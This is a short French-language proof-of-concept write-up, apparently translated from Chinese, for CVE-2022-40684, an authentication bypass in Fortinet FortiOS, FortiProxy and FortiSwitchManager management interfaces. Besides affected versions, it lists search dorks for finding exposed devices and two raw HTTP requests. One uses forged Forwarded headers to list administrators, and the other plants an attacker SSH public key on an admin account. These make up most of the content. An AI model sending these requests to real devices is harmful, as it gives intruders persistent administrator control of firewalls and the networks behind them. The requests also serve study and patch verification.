
PoC et exploit pour CVE-2022-40684, un contournement d'authentification dans les interfaces de gestion de Fortinet FortiOS, FortiProxy et FortiSwitchManager, permettant un accès administrateur non autorisé via des requêtes HTTP spécialement conçues.
Toute personne ou toute organisation utilisant le réseau doit se conformer à la Constitution et aux lois, respecter l'ordre public et la moralité sociale, ne pas nuire à la sécurité du réseau et ne pas utiliser le réseau pour porter atteinte à la sécurité, à l'honneur et aux intérêts de l'État.
Fortinet(飞塔)est un fournisseur mondialement connu de produits de sécurité réseau et de solutions de sécurité. Ses produits comprennent des pare-feu, des logiciels antivirus, des systèmes de prévention des intrusions et des composants de sécurité pour terminaux, entre autres. Dans l'interface d'administration des produits FortiOS, FortiProxy et FortiSwitchManager concernés, il est possible de contourner l'authentification en utilisant un chemin ou un canal alternatif, et d'exploiter l'interface d'administration sans authentification via des requêtes HTTP ou HTTPS spécialement conçues.
Élevé
FortiOS versions 7.2.0 - 7.2.1
FortiOS versions 7.0.0 - 7.0.6
FortiProxy versions 7.2.0
FortiProxy versions 7.0.0 - 7.0.6
FortiSwitchManager versions 7.2.0
FortiSwitchManager versions 7.0.0
title="FortiProxy“
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

